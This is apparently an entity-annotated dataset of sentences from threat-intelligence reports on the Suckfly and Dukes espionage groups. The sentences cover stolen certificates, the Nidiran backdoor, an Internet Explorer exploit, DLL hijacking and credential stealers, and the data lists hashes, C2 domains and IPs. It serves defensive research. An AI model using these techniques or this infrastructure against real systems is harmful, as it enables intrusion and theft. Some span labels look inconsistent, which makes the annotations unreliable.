{"text": "Many hacktools are made for less than ethical purposes and are freely available , so this was an initial red flag , which led us to investigate further .", "spans": []}
{"text": "As our investigation continued , we soon realized this was much larger than a few hacktools .", "spans": []}
{"text": "We discovered Suckfly , an advanced threat group , conducting targeted attacks using multiple stolen certificates , as well as hacktools and custom malware .", "spans": [{"start": 14, "end": 21, "label": "Organization"}]}
{"text": "The group had obtained the certificates through pre-attack operations before commencing targeted attacks against a number of government and commercial organizations spread across multiple continents over a two-year period .", "spans": []}
{"text": "This type of activity and the malicious use of stolen certificates emphasizes the importance of safeguarding certificates to prevent them from being used maliciously .", "spans": []}
{"text": "Suckfly has a number of hacktools and malware varieties at its disposal : Back door , Keylogger , Port scanner , Misc. tool , Exploit , Credential dumper , Privilage escalation .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 74, "end": 83, "label": "System"}, {"start": 86, "end": 95, "label": "System"}, {"start": 98, "end": 110, "label": "System"}, {"start": 113, "end": 118, "label": "System"}, {"start": 126, "end": 133, "label": "System"}, {"start": 147, "end": 153, "label": "System"}, {"start": 156, "end": 176, "label": "Vulnerability"}]}
{"text": "The first signed hacktool we identified in late 2015 was a digitally signed brute-force server message block ( SMB ) scanner .", "spans": [{"start": 88, "end": 108, "label": "System"}, {"start": 111, "end": 114, "label": "System"}]}
{"text": "The organization associated with this certificate is a South Korean mobile software developer .", "spans": []}
{"text": "While we became initially curious because the hacktool was signed , we became more suspicious when we realized a mobile software developer had signed it , since this is not the type of software typically associated with a mobile application .", "spans": []}
{"text": "Based on this discovery , we began to look for other binaries signed with the South Korean mobile software developer's certificate .", "spans": []}
{"text": "This led to the discovery of three additional hacktools also signed using this certificate .", "spans": []}
{"text": "In addition to being signed with a stolen certificate , the identified hacktools had been used in suspicious activity against a US based health provider operating in India .", "spans": []}
{"text": "This evidence indicates that the certificate \u2019s rightful owner either misused it or it had been stolen from them .", "spans": []}
{"text": "Symantec worked with the certificate owner to confirm that the hacktool was not associated with them .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]}
{"text": "Following the trail further , we traced malicious traffic back to where it originated from and looked for additional evidence to indicate that the attacker persistently used the same infrastructure .", "spans": []}
{"text": "We discovered the activity originated from three separate IP addresses , all located in Chengdu , China .", "spans": [{"start": 58, "end": 60, "label": "Indicator"}]}
{"text": "In addition to the traffic originating from Chengdu , we identified a selection of hacktools and malware signed using nine stolen certificates .", "spans": []}
{"text": "The nine stolen certificates originated from nine different companies who are physically located close together around the central districts of Seoul , South Korea .", "spans": []}
{"text": "We don't know the exact date Suckfly stole the certificates from the South Korean organizations .", "spans": [{"start": 29, "end": 36, "label": "Organization"}]}
{"text": "However , by analyzing the dates when we first saw the certificates paired with hacktools or malware , we can gain insight into when the certificates may have been stolen .", "spans": []}
{"text": "Figure 4 details how many times each stolen certificate was used in a given month .", "spans": []}
{"text": "The first sighting of three of the nine stolen certificates being used maliciously occurred in early 2014 .", "spans": []}
{"text": "Those three certificates were the only ones used in 2014 , making it likely that the other six were not compromised until 2015 .", "spans": []}
{"text": "All nine certificates were used maliciously in 2015 .", "spans": []}
{"text": "As noted earlier , the stolen certificates Symantec identified in this investigation were used to sign both hacking tools and malware .", "spans": [{"start": 43, "end": 51, "label": "Organization"}]}
{"text": "Further analysis of the malware identified what looks like a custom back door .", "spans": [{"start": 68, "end": 77, "label": "System"}]}
{"text": "We believe Suckfly specifically developed the back door for use in cyberespionage campaigns .", "spans": [{"start": 11, "end": 18, "label": "Organization"}, {"start": 46, "end": 55, "label": "System"}]}
{"text": "Symantec detects this threat as Backdoor.Nidiran .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 32, "end": 48, "label": "Malware"}]}
{"text": "Analysis of Nidiran samples determined that the back door had been updated three times since early 2014 , which fits the timeline outlined in Figure 4 .", "spans": [{"start": 12, "end": 19, "label": "Malware"}, {"start": 48, "end": 57, "label": "System"}]}
{"text": "The modifications were minor and likely performed to add capabilities and avoid detection .", "spans": []}
{"text": "While the malware is custom , it only provides the attackers with standard back door capabilities .", "spans": [{"start": 75, "end": 84, "label": "System"}]}
{"text": "Suckfly delivered Nidiran through a strategic web compromise .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 18, "end": 25, "label": "Malware"}]}
{"text": "Specifically , the threat group used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows .", "spans": [{"start": 96, "end": 105, "label": "Organization"}, {"start": 106, "end": 113, "label": "System"}, {"start": 114, "end": 124, "label": "System"}, {"start": 156, "end": 169, "label": "Vulnerability"}, {"start": 209, "end": 218, "label": "Organization"}, {"start": 219, "end": 226, "label": "System"}]}
{"text": "This exploit is triggered when a potential victim browses to a malicious page using Internet Explorer , which can allow the attacker to execute code with the same privileges as the currently logged-in user .", "spans": [{"start": 84, "end": 101, "label": "System"}]}
{"text": "Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed .", "spans": [{"start": 33, "end": 40, "label": "Malware"}, {"start": 125, "end": 129, "label": "Indicator"}]}
{"text": "The threat then executes \u201c svchost.exe \u201d , a PE file , which is actually a clean tool known as OLEVIEW.EXE .", "spans": [{"start": 27, "end": 38, "label": "Indicator"}, {"start": 45, "end": 47, "label": "System"}, {"start": 95, "end": 106, "label": "Indicator"}]}
{"text": "The executable will then load iviewers.dll , which is normally a clean , legitimate file .", "spans": [{"start": 30, "end": 42, "label": "Indicator"}]}
{"text": "Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer .", "spans": [{"start": 87, "end": 99, "label": "Indicator"}, {"start": 118, "end": 121, "label": "System"}]}
{"text": "This technique is associated with the Korplug S-MAL/Plug-x malware and is frequently used in China based cyberespionage activity .", "spans": [{"start": 38, "end": 58, "label": "Malware"}]}
{"text": "Suckfly isn\u2019t the only attack group to use certificates to sign malware but they may be the most prolific collectors of them .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "After all , Stuxnet , widely regarded as the world \u2019s first known cyberweapon , was signed using stolen certificates from companies based in Taiwan with dates much earlier than Suckfly .", "spans": [{"start": 12, "end": 19, "label": "Vulnerability"}, {"start": 177, "end": 184, "label": "Organization"}]}
{"text": "Other cyberespionage groups , including Black Vine and Hidden Lynx , have also used stolen certificates in their campaigns .", "spans": [{"start": 40, "end": 50, "label": "Organization"}, {"start": 55, "end": 66, "label": "Organization"}]}
{"text": "In April 2013 , a third-party vendor published a report about a cyberespionage group using custom malware and stolen certificates in their operations .", "spans": []}
{"text": "The report documented an advanced threat group they attributed to China .", "spans": []}
{"text": "Symantec tracks the group behind this activity as Blackfly and detects the malware they use as Backdoor.Winnti .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 50, "end": 58, "label": "Organization"}, {"start": 95, "end": 110, "label": "Malware"}]}
{"text": "The Blackfly attacks share some similarities with the more recent Suckfly attacks .", "spans": [{"start": 4, "end": 12, "label": "Organization"}, {"start": 66, "end": 73, "label": "Organization"}]}
{"text": "Blackfly began with a campaign to steal certificates , which were later used to sign malware used in targeted attacks .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]}
{"text": "The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry .", "spans": [{"start": 17, "end": 25, "label": "Organization"}]}
{"text": "Another similarity is that Suckfly stole a certificate from Company D ( see Figure 4 ) less than two years after Blackfly had stolen a certificate from the same company .", "spans": [{"start": 27, "end": 34, "label": "Organization"}, {"start": 113, "end": 121, "label": "Organization"}]}
{"text": "While the stolen certificates were different , and stolen in separate instances , they were both used with custom malware in targeted attacks originating from China .", "spans": []}
{"text": "Signing malware with code-signing certificates is becoming more common , as seen in this investigation and the other attacks we have discussed .", "spans": []}
{"text": "Attackers are taking the time and effort to steal certificates because it is becoming necessary to gain a foothold on a targeted computer .", "spans": []}
{"text": "Attempts to sign malware with code-signing certificates have become more common as the Internet and security systems have moved towards a more trust and reputation oriented model .", "spans": []}
{"text": "This means that untrusted software may not be allowed to run unless it is signed .", "spans": []}
{"text": "As we noted in our previous research on the Apple threat landscape , some operating systems , such as Mac OS X , are configured by default to only allow applications to run if they have been signed with a valid certificate , meaning they are trusted .", "spans": [{"start": 44, "end": 49, "label": "Organization"}, {"start": 102, "end": 110, "label": "System"}]}
{"text": "However , using valid code-signing certificates stolen from organizations with a positive reputation can allow attackers to piggyback on that company \u2019s trust , making it easier to slip by these defenses and gain access to targeted computers .", "spans": []}
{"text": "Suckfly paints a stark picture of where cyberattack groups and cybercriminals are focusing their attentions .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "Our investigation shines a light on an often unknown and seedier secret life of code-signing certificates , which is completely unknown to their owners .", "spans": []}
{"text": "The implications of this study shows that certificate owners need to keep a careful eye on them to prevent them from falling into the wrong hands .", "spans": []}
{"text": "It is important to give certificates the protection they need so they can't be used maliciously .", "spans": []}
{"text": "The certificates are only as secure as the safeguards that organizations put around them .", "spans": []}
{"text": "Once a certificate has been compromised , so has the reputation of the organization who signed it .", "spans": []}
{"text": "An organization whose certificate has been stolen and used to sign malware will always be associated with that activity .", "spans": []}
{"text": "Symantec monitors for this type of activity to help prevent organizations from being tied to malicious actions undertaken with their stolen certificates .", "spans": [{"start": 0, "end": 8, "label": "Organization"}]}
{"text": "During the course of this investigation , we ensured that all certificates compromised by Suckfly were revoked and the affected companies notified .", "spans": [{"start": 90, "end": 97, "label": "Organization"}]}
{"text": "Over the past few years , we have seen a number of advanced threats and cybercrime groups who have stolen code-signing certificates .", "spans": []}
{"text": "In all of the cases involving an advanced threat , the certificates were used to disguise malware as a legitimate file or application .", "spans": []}
{"text": "File hashes :", "spans": []}
{"text": "05edd53508c55b9dd64129e944662c0d 1cf5ce3e3ea310b0f7ce72a94659ff54 352eede25c74775e6102a095fb49da8c 3b595d3e63537da654de29dd01793059 4709395fb143c212891138b98460e958 50f4464d0fc20d1932a12484a1db4342 96c317b0b1b14aadfb5a20a03771f85f ba7b1392b799c8761349e7728c2656dd de5057e579be9e3c53e50f97a9b1832b e7d92039ffc2f07496fe7657d982c80f e864f32151d6afd0a3491f432c2bb7a2 .", "spans": [{"start": 0, "end": 32, "label": "Indicator"}, {"start": 33, "end": 65, "label": "Indicator"}, {"start": 66, "end": 98, "label": "Indicator"}, {"start": 99, "end": 131, "label": "Indicator"}, {"start": 132, "end": 164, "label": "Indicator"}, {"start": 165, "end": 197, "label": "Indicator"}, {"start": 198, "end": 230, "label": "Indicator"}, {"start": 231, "end": 263, "label": "Indicator"}, {"start": 264, "end": 296, "label": "Indicator"}, {"start": 297, "end": 329, "label": "Indicator"}, {"start": 330, "end": 362, "label": "Indicator"}]}
{"text": "Infrastructure :", "spans": []}
{"text": "usv0503.iqservs-jp.com aux.robertstockdill.com fli.fedora-dns-update.com bss.pvtcdn.com ssl.microsoft-security-center.com ssl.2upgrades.com 133.242.134.121 fli.fedora-dns-update.com .", "spans": [{"start": 0, "end": 22, "label": "Indicator"}, {"start": 23, "end": 46, "label": "Indicator"}, {"start": 47, "end": 72, "label": "Indicator"}, {"start": 73, "end": 87, "label": "Indicator"}, {"start": 88, "end": 121, "label": "Indicator"}, {"start": 122, "end": 139, "label": "Indicator"}, {"start": 140, "end": 155, "label": "Indicator"}, {"start": 156, "end": 181, "label": "Indicator"}]}
{"text": "Indian organizations targeted in Suckfly attacks .", "spans": [{"start": 33, "end": 40, "label": "Organization"}]}
{"text": "In March 2016 , Symantec published a blog on Suckfly , an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates .", "spans": [{"start": 16, "end": 24, "label": "Organization"}, {"start": 45, "end": 52, "label": "Organization"}]}
{"text": "Since then we have identified a number of attacks over a two-year period , beginning in April 2014 , which we attribute to Suckfly .", "spans": [{"start": 123, "end": 130, "label": "Organization"}]}
{"text": "The attacks targeted high-profile targets , including government and commercial organizations .", "spans": []}
{"text": "These attacks occurred in several different countries , but our investigation revealed that the primary targets were individuals and organizations primarily located in India .", "spans": []}
{"text": "While there have been several Suckfly campaigns that infected organizations with the group \u2019s custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": [{"start": 30, "end": 37, "label": "Organization"}, {"start": 109, "end": 125, "label": "Malware"}]}
{"text": "This suggests that these attacks were part of a planned operation against specific targets in India .", "spans": []}
{"text": "The first known Suckfly campaign began in April of 2014 .", "spans": [{"start": 16, "end": 23, "label": "Organization"}]}
{"text": "During our investigation of the campaign , we identified a number of global targets across several industries who were attacked in 2015 .", "spans": []}
{"text": "Many of the targets we identified were well known commercial organizations located in India .", "spans": []}
{"text": "These organizations included :", "spans": []}
{"text": "One of India 's largest financial organizations A large e-commerce company The e-commerce company 's primary shipping vendor One of India 's top five IT firms A United States healthcare provider 's Indian business unit Two government organizations .", "spans": []}
{"text": "Suckfly spent more time attacking the government networks compared to all but one of the commercial targets .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "Additionally , one of the two government organizations had the highest infection rate of the Indian targets .", "spans": []}
{"text": "Figure 1 shows the infection rate for each of the targets .", "spans": []}
{"text": "Indian government org #2 is responsible for implementing network software for different ministries and departments within India 's central government .", "spans": []}
{"text": "The high infection rate for this target is likely because of its access to technology and information related to other Indian government organizations .", "spans": []}
{"text": "Suckfly 's attacks on government organizations that provide information technology services to other government branches is not limited to India .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "It has conducted attacks on similar organizations in Saudi Arabia , likely because of the access that those organizations have .", "spans": []}
{"text": "Suckfly 's targets are displayed in figure 2 by their industry , which provides a clearer view of the group \u2019s operations .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "Most of the group 's attacks are focused on government or technology related companies and organizations .", "spans": []}
{"text": "One of the attacks we investigated provided detailed insight into how Suckfly conducts its operations .", "spans": [{"start": 70, "end": 77, "label": "Organization"}]}
{"text": "In 2015 , Suckfly conducted a multistage attack between April 22 and May 4 against an e-commerce organization based in India .", "spans": [{"start": 10, "end": 17, "label": "Organization"}]}
{"text": "Similar to its other attacks , Suckfly used the Nidiran back door along with a number of hacktools to infect the victim 's internal hosts .", "spans": [{"start": 31, "end": 38, "label": "Organization"}, {"start": 48, "end": 55, "label": "Malware"}]}
{"text": "The tools and malware used in this breach were also signed with stolen digital certificates .", "spans": []}
{"text": "Suckfly 's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company 's internal network .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "We don't have hard evidence of how Suckfly obtained information on the targeted user , but we did find a large open-source presence on the initial target .", "spans": [{"start": 35, "end": 42, "label": "Organization"}]}
{"text": "The target 's job function , corporate email address , information on work related projects , and publicly accessible personal blog could all be freely found online .", "spans": [{"start": 39, "end": 44, "label": "System"}]}
{"text": "On April 22 , 2015 , Suckfly exploited a vulnerability on the targeted employee 's operating system ( Windows ) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack .", "spans": [{"start": 21, "end": 28, "label": "Organization"}, {"start": 102, "end": 109, "label": "System"}, {"start": 153, "end": 173, "label": "System"}, {"start": 190, "end": 197, "label": "Malware"}]}
{"text": "While we know the attackers used a custom dropper to install the back door , we do not know the delivery vector .", "spans": []}
{"text": "Based on the amount of open-source information available on the target , it is feasible that a spear-phishing email may have been used .", "spans": [{"start": 110, "end": 115, "label": "System"}]}
{"text": "After the attackers successfully exploited the employee \u2019s system , they gained access to the e-commerce company 's internal network .", "spans": []}
{"text": "We found evidence that Suckfly used hacktools to move latterly and escalate privileges .", "spans": [{"start": 23, "end": 30, "label": "Organization"}]}
{"text": "To do this the attackers used a signed credential-dumping tool to obtain the victim 's account credentials .", "spans": []}
{"text": "With the account credentials , the attackers were able to access the victim 's account and navigate the internal corporate network as though they were the employee .", "spans": []}
{"text": "On April 27 , the attackers scanned the corporate internal network for hosts with ports 8080 , 5900 , and 40 open .", "spans": []}
{"text": "Ports 8080 and 5900 are common ports used with legitimate protocols , but can be abused by attackers when they are not secured .", "spans": []}
{"text": "It isn't clear why the attackers scanned for hosts with port 40 open because there isn't a common protocol assigned to this port .", "spans": []}
{"text": "Based on Suckfly scanning for common ports , it \u2019s clear that the group was looking to expand its foothold on the e-commerce company 's internal network .", "spans": [{"start": 9, "end": 16, "label": "Organization"}]}
{"text": "The attackers \u2019 final step was to exfiltrate data off the victim \u2019s network and onto Suckfly \u2019s infrastructure .", "spans": [{"start": 85, "end": 92, "label": "Organization"}]}
{"text": "While we know that the attackers used the Nidiran back door to steal information about the compromised organization , we do not know if Suckfly was successful in stealing other information .", "spans": [{"start": 42, "end": 49, "label": "Malware"}, {"start": 136, "end": 143, "label": "Organization"}]}
{"text": "These steps were taken over a 13-day period , but only on specific days .", "spans": []}
{"text": "While tracking what days of the week Suckfly used its hacktools , we discovered that the group was only active Monday through Friday .", "spans": [{"start": 37, "end": 44, "label": "Organization"}]}
{"text": "There was no activity from the group on weekends .", "spans": []}
{"text": "We were able to determine this because the attackers \u2019 hacktools are command line driven and can provide insight into when the operators are behind keyboards actively working .", "spans": []}
{"text": "Figure 4 shows the attackers \u2019 activity levels throughout the week .", "spans": []}
{"text": "Suckfly made its malware difficult to analyze to prevent their operations from being detected .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "However , we were able to successfully analyze Suckfly malware samples and extract some of the communications between the Nidiran back door and the Suckfly command and control ( C&C ) domains .", "spans": [{"start": 47, "end": 54, "label": "Organization"}, {"start": 122, "end": 129, "label": "Malware"}, {"start": 148, "end": 155, "label": "Organization"}, {"start": 156, "end": 175, "label": "System"}, {"start": 178, "end": 181, "label": "System"}]}
{"text": "We analyzed the dropper , which is an executable that contains the following three files :", "spans": [{"start": 16, "end": 23, "label": "System"}]}
{"text": "dllhost.exe : The main host for the .dll file . iviewers.dll : Used to load encrypted payloads and then decrypt them . msfled : The encrypted payload .", "spans": [{"start": 0, "end": 11, "label": "Indicator"}, {"start": 36, "end": 40, "label": "Indicator"}, {"start": 48, "end": 60, "label": "Indicator"}]}
{"text": "All three files are required for the malware to run correctly .", "spans": []}
{"text": "Once the malware has been executed , it checks to see if it has a connection to the internet before running .", "spans": []}
{"text": "If the connection test is successful , the malware runs and attempts to communicate with the C&C domain over ports 443 and 8443 .", "spans": [{"start": 93, "end": 96, "label": "System"}]}
{"text": "In the samples we analyzed we found the port and C&C information encrypted and hardcoded into the Nidiran malware itself .", "spans": [{"start": 49, "end": 52, "label": "System"}, {"start": 98, "end": 105, "label": "Malware"}]}
{"text": "The key for the RC4 encryption in this sample is the hardcoded string \u201c h0le \u201d .", "spans": []}
{"text": "Once the cookie data is decoded , Suckfly has the network name , hostname , IP address , and the victim 's operating system information .", "spans": [{"start": 34, "end": 41, "label": "Organization"}, {"start": 76, "end": 78, "label": "Indicator"}]}
{"text": "Information about the C&C infrastructure identified in our analysis of Suckfly activity can be seen in Table 1 .", "spans": [{"start": 22, "end": 25, "label": "System"}, {"start": 71, "end": 78, "label": "Organization"}]}
{"text": "Domain Registration IP address Registration date", "spans": [{"start": 20, "end": 22, "label": "Indicator"}]}
{"text": "aux.robertstockdill.com kumar.pari@yandex.com Unknown April 1 , 2014 . ssl.2upgrades.com kumar.pari@yandex.com 176.58.96.234 July 5 , 2014 . bss.pvtcdn.com registrar@mail.zgsj.com 106.184.1.38 May 19 , 2015 .", "spans": [{"start": 0, "end": 23, "label": "Indicator"}, {"start": 24, "end": 45, "label": "Indicator"}, {"start": 71, "end": 88, "label": "Indicator"}, {"start": 89, "end": 110, "label": "Indicator"}, {"start": 111, "end": 124, "label": "Indicator"}, {"start": 141, "end": 155, "label": "Indicator"}, {"start": 156, "end": 179, "label": "Indicator"}, {"start": 180, "end": 192, "label": "Indicator"}]}
{"text": "ssl.microsoft-security-center.com Whoisguard Unknown July 20 , 2015 E-TIME.usv0503.iqservs-jp.com Domain@quicca.com 133.242.134.121 August 18 , 2014 .", "spans": [{"start": 0, "end": 33, "label": "Indicator"}, {"start": 34, "end": 44, "label": "System"}, {"start": 63, "end": 97, "label": "Indicator"}, {"start": 98, "end": 115, "label": "Indicator"}, {"start": 116, "end": 131, "label": "Indicator"}]}
{"text": "fli.fedora-dns-update.com Whoisguard Unknown Unknown .", "spans": [{"start": 0, "end": 25, "label": "Indicator"}, {"start": 26, "end": 36, "label": "System"}]}
{"text": "Suckfly targeted one of India \u2019s largest e-commerce companies , a major Indian shipping company , one of India \u2019s largest financial organizations , and an IT firm that provides support for India \u2019s largest stock exchange .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "All of these targets are large corporations that play a major role in India \u2019s economy .", "spans": []}
{"text": "By targeting all of these organizations together , Suckfly could have had a much larger impact on India and its economy .", "spans": [{"start": 51, "end": 58, "label": "Organization"}]}
{"text": "While we don't know the motivations behind the attacks , the targeted commercial organizations , along with the targeted government organizations , may point in this direction .", "spans": []}
{"text": "Suckfly has the resources to develop malware , purchase infrastructure , and conduct targeted attacks for years while staying off the radar of security organizations .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "During this time they were able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations .", "spans": [{"start": 117, "end": 152, "label": "Organization"}]}
{"text": "There is no evidence that Suckfly gained any benefits from attacking the government organizations , but someone else may have benefited from these attacks .", "spans": [{"start": 26, "end": 33, "label": "Organization"}]}
{"text": "The nature of the Suckfly attacks suggests that it is unlikely that the threat group orchestrated these attacks on their own .", "spans": [{"start": 18, "end": 25, "label": "Organization"}]}
{"text": "We believe that Suckfly will continue to target organizations in India and similar organizations in other countries in order to provide economic insight to the organization behind Suckfly 's operations .", "spans": [{"start": 16, "end": 23, "label": "Organization"}, {"start": 180, "end": 187, "label": "Organization"}]}
{"text": "THE DUKES 7 YEARS OF RUSSIAN CYBERESPIONAGE .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]}
{"text": "TOOLS AND TECHNIQUES OF THE DUKES .", "spans": [{"start": 28, "end": 33, "label": "Organization"}]}
{"text": "PINCHDUKE : First known activity November 2008 , Most recent known activity Summer 2010 , C&C communication methods HTTP(S) , Known toolset components Multiple loaders , Information stealer .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 90, "end": 93, "label": "System"}, {"start": 116, "end": 123, "label": "Indicator"}, {"start": 160, "end": 167, "label": "System"}, {"start": 170, "end": 189, "label": "System"}]}
{"text": "The PinchDuke toolset consists of multiple loaders and a core information stealer Trojan .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 43, "end": 50, "label": "System"}, {"start": 62, "end": 81, "label": "System"}, {"start": 82, "end": 88, "label": "Malware"}]}
{"text": "The loaders associated with the PinchDuke toolset have also been observed being used with CosmicDuke .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 32, "end": 41, "label": "Malware"}, {"start": 90, "end": 100, "label": "Malware"}]}
{"text": "The PinchDuke information stealer gathers system configuration information , steals user credentials , and collects user files from the compromised host transferring these via HTTP (S ) to a C&C server .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 14, "end": 33, "label": "System"}, {"start": 176, "end": 185, "label": "Indicator"}, {"start": 191, "end": 194, "label": "System"}]}
{"text": "We believe PinchDuke \u2019s credential stealing functionality is based on the source code of the Pinch credential stealing malware ( also known as LdPinch ) that was developed in the early 2000s and has later been openly distributed on underground forums .", "spans": [{"start": 11, "end": 20, "label": "Malware"}, {"start": 93, "end": 98, "label": "System"}, {"start": 143, "end": 150, "label": "Malware"}]}
{"text": "Credentials targeted by PinchDuke include ones associated with the following software or services : The Bat! , Yahoo! , Mail.ru , Passport.Net , Google Talk , Netscape Navigator , Mozilla Firefox , Mozilla Thunderbird , Internet Explorer , Microsoft Outlook , WinInet Credential Cache , Lightweight Directory Access Protocol ( LDAP ) .", "spans": [{"start": 24, "end": 33, "label": "Malware"}, {"start": 104, "end": 108, "label": "System"}, {"start": 111, "end": 117, "label": "System"}, {"start": 120, "end": 127, "label": "Indicator"}, {"start": 130, "end": 142, "label": "Indicator"}, {"start": 145, "end": 156, "label": "System"}, {"start": 159, "end": 177, "label": "System"}, {"start": 180, "end": 195, "label": "System"}, {"start": 198, "end": 217, "label": "System"}, {"start": 220, "end": 237, "label": "System"}, {"start": 240, "end": 249, "label": "Organization"}, {"start": 250, "end": 257, "label": "System"}, {"start": 260, "end": 284, "label": "System"}, {"start": 287, "end": 324, "label": "System"}, {"start": 327, "end": 331, "label": "System"}]}
{"text": "PinchDuke will also search for files that have been created within a predefined timeframe and whose file extension is present in a predefined list .", "spans": [{"start": 0, "end": 9, "label": "Malware"}]}
{"text": "As a curiosity , most PinchDuke samples contain a Russian language error message : \u201c There is an error in the module \u2019s name ! The length of the data section name must be 4 bytes \u201d .", "spans": [{"start": 22, "end": 31, "label": "Malware"}]}
{"text": "GEMINIDUKE : First known activity January 2009 , Most recent known activity December 2012 , C&C communication methods HTTP(S) , Known toolset components Loader , Information stealer , Multiple persistence components .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 92, "end": 95, "label": "System"}, {"start": 118, "end": 125, "label": "Indicator"}, {"start": 153, "end": 159, "label": "System"}, {"start": 162, "end": 181, "label": "System"}, {"start": 184, "end": 215, "label": "System"}]}
{"text": "The GeminiDuke toolset consists of a core information stealer , a loader and multiple persistencerelated components .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 42, "end": 61, "label": "System"}, {"start": 66, "end": 72, "label": "System"}, {"start": 77, "end": 115, "label": "System"}]}
{"text": "Unlike CosmicDuke and PinchDuke , GeminiDuke primarily collects information on the victim computer \u2019s configuration .", "spans": [{"start": 7, "end": 17, "label": "Malware"}, {"start": 22, "end": 31, "label": "Malware"}, {"start": 34, "end": 44, "label": "Malware"}]}
{"text": "The collected details include : Local user accounts , Network settings , Internet proxy settings , Installed drivers , Running processes , Programs previously executed by users , Programs and services configured to automatically run at startup , Values of environment variables , Files and folders present in any users home folder , Files and folders present in any users My Documents , Programs installed to the Program Files folder , Recently accessed files , folders and programs .", "spans": []}
{"text": "As is common for malware , the GeminiDuke infostealer uses a mutex to ensure that only one instance of itself is running at a time .", "spans": [{"start": 31, "end": 41, "label": "Malware"}, {"start": 42, "end": 53, "label": "System"}]}
{"text": "What is less common is that the name used for the mutex is often a timestamp .", "spans": []}
{"text": "We believe these timestamps to be generated during the compilation of GeminiDuke from the local time of the computer being used .", "spans": [{"start": 70, "end": 80, "label": "Malware"}]}
{"text": "Comparing the GeminiDuke compilation timestamps , which always reference the time in the UTC+0 timezone , with the local time timestamps used as mutex names , and adjusting for the presumed timezone difference , we note that all of the mutex names reference a time and date that is within seconds of the respective sample \u2019s compilation timestamp .", "spans": [{"start": 14, "end": 24, "label": "Malware"}]}
{"text": "Additionally , the apparent timezone of the timestamps in all of the GeminiDuke samples compiled during the winter is UTC+3 , while for samples compiled during the summer , it is UTC+4 .", "spans": [{"start": 69, "end": 79, "label": "Malware"}]}
{"text": "The observed timezones correspond to the pre-2011 definition of Moscow Standard Time ( MSK ) , which was UTC+3 during the winter and UTC+4 during the summer .", "spans": []}
{"text": "In 2011 MSK stopped following Daylight Saving Time ( DST ) and was set to UTC+4 year-round , then reset to UTC +3 yearround in 2014 .", "spans": []}
{"text": "Some of the observed GeminiDuke samples that used timestamps as mutex names were compiled while MSK still respected DST and for these samples , the timestamps perfectly align with MSK as it was defined at the time .", "spans": [{"start": 21, "end": 31, "label": "Malware"}]}
{"text": "However , GeminiDuke samples compiled after MSK was altered still vary the timezone between UTC+3 in the winter and UTC+4 during the summer .", "spans": [{"start": 10, "end": 20, "label": "Malware"}]}
{"text": "While computers using Microsoft Windows automatically adjust for DST , changes in timezone definitions require that an update to Windows be installed .", "spans": [{"start": 22, "end": 31, "label": "Organization"}, {"start": 32, "end": 39, "label": "System"}, {"start": 129, "end": 136, "label": "System"}]}
{"text": "We therefore believe that the Dukes group simply failed to update the computer they were using to compile GeminiDuke samples , so that the timestamps seen in later samples still appear to follow the old definition of Moscow Standard Time .", "spans": [{"start": 30, "end": 35, "label": "Organization"}, {"start": 106, "end": 116, "label": "Malware"}]}
{"text": "The GeminiDuke infostealer has occasionally been wrapped with a loader that appears to be unique to GeminiDuke and has never been observed being used with any of the other Duke toolsets .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 100, "end": 110, "label": "Malware"}, {"start": 172, "end": 176, "label": "Organization"}]}
{"text": "GeminiDuke also occasionally embeds additional executables that attempt to achieve persistence on the victim computer .", "spans": [{"start": 0, "end": 10, "label": "Malware"}]}
{"text": "These persistence components appear to be uniquely customized for use with GeminiDuke , but they use many of the same techniques as CosmicDuke persistence components .", "spans": [{"start": 75, "end": 85, "label": "Malware"}, {"start": 132, "end": 142, "label": "Malware"}]}
{"text": "COSMICDUKE : First known activity January 2010 , Most recent known activity Summer 2015 , Other names Tinybaron , BotgenStudios , NemesisGemina , C&C communication methods HTTP(S) , FTP , WebDav , Known toolset components Information stealer , Multiple loaders , Privilege escalation component , Multiple persistence components .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 102, "end": 111, "label": "Malware"}, {"start": 114, "end": 127, "label": "Malware"}, {"start": 130, "end": 143, "label": "Malware"}, {"start": 146, "end": 149, "label": "System"}, {"start": 172, "end": 179, "label": "Indicator"}, {"start": 182, "end": 185, "label": "Indicator"}, {"start": 188, "end": 194, "label": "Indicator"}, {"start": 222, "end": 241, "label": "System"}, {"start": 253, "end": 260, "label": "System"}]}
{"text": "The CosmicDuke toolset is designed around a main information stealer component .", "spans": [{"start": 4, "end": 14, "label": "Malware"}, {"start": 49, "end": 68, "label": "System"}]}
